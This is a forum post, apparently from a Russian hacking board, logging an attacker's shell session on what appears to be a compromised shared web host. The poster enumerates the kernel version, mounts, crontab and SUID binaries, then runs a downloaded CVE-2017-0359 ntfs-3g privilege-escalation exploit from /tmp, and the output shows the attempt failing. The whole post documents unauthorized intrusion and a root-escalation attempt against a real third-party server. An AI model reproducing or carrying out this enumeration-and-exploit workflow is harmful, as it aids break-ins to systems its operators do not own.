|
Guest
Сообщений: n/a
Провел на форуме:
60408
Репутация:
0
|
|
uname -a
Код:
Code:
Linux winetime.ellyt.com 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1+deb8u2 (2017-03-07) x86_64 GNU/Linux
sh-4.3$ ls -la /boot
Код:
Code:
total 20512
drwxr-xr-x 3 root root 4096 Jun 1 08:25 .
drwxr-xr-x 23 root root 4096 Jun 1 09:11 ..
-rw-r--r-- 1 root root 2681172 Mar 8 01:59 System.map-3.16.0-4-amd64
-rw-r--r-- 1 root root 157815 Mar 8 01:59 config-3.16.0-4-amd64
drwxr-xr-x 5 root root 4096 Apr 6 11:52 grub
-rw-r--r-- 1 root root 15017568 Jun 1 08:25 initrd.img-3.16.0-4-amd64
-rw-r--r-- 1 root root 3128784 Mar 8 01:58 vmlinuz-3.16.0-4-amd64
ls -la --full-time /lib
Код:
Code:
total 280
drwxr-xr-x 16 root root 4096 2017-06-01 08:24:38.147095248 +0300 .
drwxr-xr-x 23 root root 4096 2017-06-01 09:11:13.863704998 +0300 ..
lrwxrwxrwx 1 root root 21 2017-04-07 21:12:08.155124000 +0300 cpp -> /etc/alternatives/cpp
drwxr-xr-x 2 root root 4096 2017-04-06 11:11:32.822435000 +0300 discover
drwxr-xr-x 2 root root 4096 2017-04-06 11:08:06.370435000 +0300 ifupdown
drwxr-xr-x 2 root root 4096 2017-04-06 11:07:50.358435000 +0300 init
-rwxr-xr-x 1 root root 71416 2014-10-05 04:01:50.000000000 +0300 klibc-IpHGKKbZiB_yZ7GPagmQz2GwVAQ.so
lrwxrwxrwx 1 root root 17 2014-11-08 19:03:39.000000000 +0200 libip4tc.so.0 -> libip4tc.so.0.1.0
-rw-r--r-- 1 root root 31416 2014-11-08 19:03:41.000000000 +0200 libip4tc.so.0.1.0
lrwxrwxrwx 1 root root 17 2014-11-08 19:03:39.000000000 +0200 libip6tc.so.0 -> libip6tc.so.0.1.0
-rw-r--r-- 1 root root 31416 2014-11-08 19:03:41.000000000 +0200 libip6tc.so.0.1.0
lrwxrwxrwx 1 root root 15 2014-11-08 19:03:39.000000000 +0200 libipq.so.0 -> libipq.so.0.0.0
-rw-r--r-- 1 root root 10544 2014-11-08 19:03:41.000000000 +0200 libipq.so.0.0.0
lrwxrwxrwx 1 root root 16 2014-11-08 19:03:39.000000000 +0200 libiptc.so.0 -> libiptc.so.0.0.0
-rw-r--r-- 1 root root 5816 2014-11-08 19:03:41.000000000 +0200 libiptc.so.0.0.0
lrwxrwxrwx 1 root root 20 2014-11-08 19:03:39.000000000 +0200 libxtables.so.10 -> libxtables.so.10.0.0
-rw-r--r-- 1 root root 51896 2014-11-08 19:03:42.000000000 +0200 libxtables.so.10.0.0
drwxr-xr-x 3 root root 4096 2017-04-06 11:07:50.206435000 +0300 lsb
drwxr-xr-x 2 root root 4096 2017-04-06 11:08:07.734435000 +0300 modprobe.d
drwxr-xr-x 3 root root 4096 2017-04-06 11:08:31.846435000 +0300 modules
drwxr-xr-x 2 root root 4096 2017-06-01 08:24:38.227099822 +0300 modules-load.d
drwxr-xr-x 2 root root 4096 2017-04-06 11:07:50.270435000 +0300 startpar
drwxr-xr-x 8 root root 4096 2017-04-06 11:07:55.662435000 +0300 systemd
drwxr-xr-x 15 root root 4096 2017-04-06 11:07:27.242435000 +0300 terminfo
drwxr-xr-x 4 root root 4096 2017-04-06 11:08:00.966435000 +0300 udev
drwxr-xr-x 2 root root 4096 2017-04-22 18:39:02.116227245 +0300 ufw
drwxr-xr-x 4 root root 12288 2017-06-01 08:24:52.967942493 +0300 x86_64-linux-gnu
drwxr-xr-x 2 root root 4096 2017-04-06 11:08:07.490435000 +0300 xtables
ls -la --full-time /lib64
Код:
Code:
total 8
drwxr-xr-x 2 root root 4096 2017-04-06 11:07:37.814435000 +0300 .
drwxr-xr-x 23 root root 4096 2017-06-01 09:11:13.863704998 +0300 ..
lrwxrwxrwx 1 root root 32 2016-11-28 06:26:42.000000000 +0200 ld-linux-x86-64.so.2 -> /lib/x86_64-linux-gnu/ld-2.19.so
mount
Код:
Code:
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
udev on /dev type devtmpfs (rw,relatime,size=10240k,nr_inodes=255197,mode=755)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000)
tmpfs on /run type tmpfs (rw,nosuid,relatime,size=411712k,mode=755)
/dev/sda2 on / type ext4 (rw,relatime,errors=remount-ro,data=ordered,jqfmt=vfsv0,usrjquota=quota.user,grpjquota=quota.group)
securityfs on /sys/kernel/security type securityfs (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
tmpfs on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k)
tmpfs on /sys/fs/cgroup type tmpfs (ro,nosuid,nodev,noexec,mode=755)
cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,release_agent=/lib/systemd/systemd-cgroups-agent,name=systemd)
pstore on /sys/fs/pstore type pstore (rw,nosuid,nodev,noexec,relatime)
cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpu,cpuacct)
cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio)
cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
systemd-1 on /proc/sys/fs/binfmt_misc type autofs (rw,relatime,fd=22,pgrp=1,timeout=300,minproto=5,maxproto=5,direct)
mqueue on /dev/mqueue type mqueue (rw,relatime)
debugfs on /sys/kernel/debug type debugfs (rw,relatime)
hugetlbfs on /dev/hugepages type hugetlbfs (rw,relatime)
fusectl on /sys/fs/fuse/connections type fusectl (rw,relatime)
/dev/sdb1 on /var type ext4 (rw,relatime,errors=remount-ro,data=ordered,jqfmt=vfsv0,usrjquota=quota.user,grpjquota=quota.group)
/dev/sdc1 on /backup type ext4 (rw,relatime,errors=remount-ro,data=ordered,jqfmt=vfsv0,usrjquota=quota.user,grpjquota=quota.group)
/dev/sdb1 on /var/www/clients/client2/web7/log type ext4 (rw,relatime,errors=remount-ro,data=ordered,jqfmt=vfsv0,usrjquota=quota.user,grpjquota=quota.group)
rpc_pipefs on /run/rpc_pipefs type rpc_pipefs (rw,relatime)
/dev/sdb1 on /var/www/clients/client2/web6/log type ext4 (rw,relatime,errors=remount-ro,data=ordered,jqfmt=vfsv0,usrjquota=quota.user,grpjquota=quota.group)
/dev/sdb1 on /var/www/clients/client2/web8/log type ext4 (rw,relatime,errors=remount-ro,data=ordered,jqfmt=vfsv0,usrjquota=quota.user,grpjquota=quota.group)
binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,relatime)
df -h
Код:
Code:
Filesystem Size Used Avail Use% Mounted on
/dev/sda2 3.0G 1.8G 1.1G 62% /
udev 10M 0 10M 0% /dev
tmpfs 403M 41M 362M 11% /run
tmpfs 1006M 0 1006M 0% /dev/shm
tmpfs 5.0M 4.0K 5.0M 1% /run/lock
tmpfs 1006M 0 1006M 0% /sys/fs/cgroup
/dev/sdb1 99G 40G 54G 43% /var
/dev/sdc1 99G 359M 93G 1% /backup
Код:
Code:
Debian GNU/Linux 8 \n \l
cat /etc/crontab
Код:
Code:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
cat /proc/version
Код:
Code:
Linux version 3.16.0-4-amd64 (debian-kernel@lists.debian.org) (gcc version 4.8.4 (Debian 4.8.4-1) ) #1 SMP Debian 3.16.39-1+deb8u2 (2017-03-07)
cat /proc/sys/vm/mmap_min_addr
pwd
Код:
Code:
/var/www/clients/client2/web8/web/modules/crm
ls -la /usr/bin/staprun
Код:
Code:
ls: cannot access /usr/bin/staprun: No such file or directory
sh-4.3$ find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
Код:
Code:
find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
-rwsr-xr-x 1 root root 90456 Aug 13 2014 /sbin/mount.nfs
-rwsr-xr-x 1 root root 23472 Apr 7 21:58 /usr/sbin/jk_chrootsh
-rwsr-xr-x 1 root root 13824 Apr 7 21:58 /usr/sbin/jk_procmailwrapper
-rwsr-xr-- 1 root www-data 18472 Feb 24 20:40 /usr/lib/apache2/suexec-pristine
-rwsr-xr-x 1 root root 10104 Mar 28 08:33 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 464904 Jul 22 2016 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 294512 Nov 22 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 39912 Feb 24 10:09 /usr/bin/newgrp
-rwsr-sr-x 1 root mail 89248 Feb 11 2015 /usr/bin/procmail
-rwsr-xr-x 1 root root 54192 Feb 24 10:09 /usr/bin/passwd
-rwsr-sr-x 1 daemon daemon 55424 Sep 30 2014 /usr/bin/at
-rwsr-xr-x 1 root root 75376 Feb 24 10:09 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 44464 Feb 24 10:09 /usr/bin/chsh
-rwsr-xr-x 1 root root 53616 Feb 24 10:09 /usr/bin/chfn
-rwsr-xr-x 1 root root 157760 Jan 11 2016 /usr/bin/sudo
-rwsr-xr-x 1 root root 146160 Jan 28 12:16 /bin/ntfs-3g
-rwsr-xr-x 1 root root 30800 Jan 21 2016 /bin/fusermount
-rwsr-xr-x 1 root root 40168 Feb 24 10:09 /bin/su
-rwsr-xr-x 1 root root 27416 Mar 30 2015 /bin/umount
-rwsr-xr-x 1 root root 40000 Mar 30 2015 /bin/mount
meow MEOW!
p.s.
/bin/ntfs-3g
Код:
Code:
ntfs-3g: No device is specified.
ntfs-3g 2014.2.15AR.2 integrated FUSE 28 - Third Generation NTFS Driver
Configuration type 7, XATTRS are on, POSIX ACLS are on
Copyright (C) 2005-2007 Yura Pakhuchiy
Copyright (C) 2006-2009 Szabolcs Szakacsits
Copyright (C) 2007-2014 Jean-Pierre Andre
Copyright (C) 2009 Erik Larsson
Usage: ntfs-3g [-o option[,...]]
Options: ro (read-only mount), windows_names, uid=, gid=,
umask=, fmask=, dmask=, streams_interface=.
Please see the details in the manual (type: man ntfs-3g).
Example: ntfs-3g /dev/sda1 /mnt/windows
News, support and information: http://tuxera.com
одняко -> http://0day.today/exploit/26893 ->
Код:
Code:
sh-4.3$ /bin/bash /tmp/1.sh
/bin/bash /tmp/1.sh
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ CVE-2017-0359, PoC by Kristian Erik Hermansen @
@ ntfs-3g local privilege escalation to root @
@ Credits to Google Project Zero @
@ Affects: Debian 9/8/7, Ubuntu, Gentoo, others @
@ Tested: Debian 9 (Stretch) @
@ Date: 2017-02-03 @
@ Link: https://goo.gl/A9I8Vq @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@[*] Gathering environment info ...[*] Creating kernel hijack directories ...
mkdir: cannot create directory '/var/www/clients/client2/web8/web/modules/crm/lib': Permission denied
mkdir: cannot create directory '/var/www/clients/client2/web8/web/modules/crm/kernel': Permission denied[*] Forging symlinks ...
ln: failed to create symbolic link '/var/www/clients/client2/web8/web/modules/crm/lib/modules\r/3.16.0-4-amd64\r\r': No such file or directory
ln: failed to create symbolic link '/var/www/clients/client2/web8/web/modules/crm/kernel/fs\r/fuse\r': No such file or directory
ln: failed to create symbolic link 'fuse.ko\r': Permission denied[*] Pulling in deps ...[*] Building kernel module ...
/tmp/1.sh: line 25: $'\r': command not found
/tmp/1.sh: line 64: warning: here-document at line 26 delimited by end-of-file (wanted `EOF')
: Permission denied cve_2017_0358.c
|